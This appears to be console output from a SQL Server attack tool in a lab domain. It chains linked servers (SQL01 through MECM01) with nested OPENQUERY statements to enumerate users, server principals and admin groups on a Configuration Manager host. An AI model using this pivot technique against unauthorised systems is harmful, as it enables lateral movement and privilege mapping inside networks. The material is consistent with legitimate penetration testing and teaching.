[*] Setting the chain path to SQL01 -> SQL02 -> SQL03 -> MECM01
[*] Executing the 'users' module on MECM01
[VERBOSE] Query:
|-> SELECT name FROM sys.servers WHERE is_linked = 1;
[*] Users in the 'master' database
[VERBOSE] Query:
|-> SELECT * FROM OPENQUERY("SQL02", 'SELECT * FROM OPENQUERY("SQL03", ''SELECT * FROM OPENQUERY("MECM01", ''''SELECT name AS username, create_date, modify_date, type_desc AS type, authentication_type_desc AS authentication_type FROM sys.database_principals WHERE type NOT IN (''''''''A'''''''', ''''''''R'''''''', ''''''''X'''''''') AND sid IS NOT null AND name NOT LIKE ''''''''##%'''''''' ORDER BY modify_date DESC;'''')'')')
| username | create_date | modify_date | type | authentication_type |
| ------------------- | ------------------- | ------------------- | ------------ | ------------------- |
| NT AUTHORITY\SYSTEM | 6/7/2023 9:32:08 AM | 6/7/2023 9:32:08 AM | WINDOWS_USER | WINDOWS |
| guest | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER | NONE |
| dbo | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER | INSTANCE |
[*] Server principals
[VERBOSE] Query:
|-> SELECT * FROM OPENQUERY("SQL02", 'SELECT * FROM OPENQUERY("SQL03", ''SELECT * FROM OPENQUERY("MECM01", ''''SELECT name, type_desc, is_disabled, create_date, modify_date FROM sys.server_principals WHERE name NOT LIKE ''''''''##%'''''''' ORDER BY modify_date DESC;'''')'')')
| name | type_desc | is_disabled | create_date | modify_date |
| ---------------------------- | ------------- | ----------- | --------------------- | --------------------- |
| KAWALABS\JSmith | WINDOWS_LOGIN | False | 6/4/2024 11:15:37 AM | 6/4/2024 11:15:37 AM |
| KAWALABS\acon | WINDOWS_LOGIN | False | 6/4/2024 11:15:37 AM | 6/4/2024 11:15:37 AM |
| NT AUTHORITY\NETWORK SERVICE | WINDOWS_LOGIN | False | 6/7/2023 9:58:19 AM | 6/7/2023 9:58:19 AM |
| MECM01\ConfigMgr_DViewAccess | WINDOWS_GROUP | False | 6/7/2023 9:37:35 AM | 6/7/2023 9:37:35 AM |
| NT AUTHORITY\SYSTEM | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/7/2023 9:32:08 AM |
| NT SERVICE\SQLTELEMETRY | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| NT SERVICE\SQLSERVERAGENT | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| sa | SQL_LOGIN | False | 4/8/2003 9:10:35 AM | 6/6/2023 12:39:59 PM |
| NT SERVICE\MSSQLSERVER | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| NT SERVICE\Winmgmt | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| NT SERVICE\SQLWriter | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| KAWALABS\Domain Admins | WINDOWS_GROUP | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| KAWALABS\mssccm_svc | WINDOWS_LOGIN | False | 6/6/2023 12:39:59 PM | 6/6/2023 12:39:59 PM |
| public | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| sysadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| securityadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| serveradmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| setupadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| processadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| diskadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| dbcreator | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| bulkadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |